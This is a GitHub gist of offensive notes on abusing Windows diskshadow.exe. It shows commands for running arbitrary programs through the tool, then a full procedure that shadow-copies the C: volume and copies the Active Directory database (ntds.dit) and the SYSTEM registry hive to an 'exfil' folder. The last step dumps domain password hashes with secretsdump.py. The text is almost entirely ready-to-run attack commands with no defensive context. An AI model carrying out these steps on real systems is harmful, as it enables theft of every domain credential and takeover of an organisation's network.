-
-
Save sasqwatch/877fcc37aa4d7ed00b2dd7dab24b9145 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Execute | |
| ======= | |
| *Interactive Mode | |
| cmd.exe | |
| c:\windows\system32\diskshadow.exe | |
| > exec calc.exe | |
| > exec "cmd.exe" /c calc.exe | |
| > exit | |
| *Script Mode | |
| - Create a script (txt) file (e.g. diskshadow.txt) | |
| exec calc.exe | |
| exec notepad.exe | |
| - Run Script | |
| diskshadow.exe /s c:\test\diskshadow.txt | |
| ----------------------- | |
| Extract AD DB | |
| ============= | |
| - Create Sscript (diskshadow.txt) | |
| set context persistent nowriters | |
| add volume c: alias someAlias | |
| create | |
| expose %someAlias% z: | |
| exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit | |
| delete shadows volume %someAlias% | |
| reset | |
| - Run the Script | |
| diskshadow.exe /s c:\diskshadow.txt | |
| - Capture the System Registry Hive | |
| reg.exe save hklm\system c:\exfil\system.bak | |
| -Copy off the AD DB/System Hive and extract hashes with SecretsDump | |
| secretsdump.py -ntds ntds.dit -system system.bak LOCAL |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment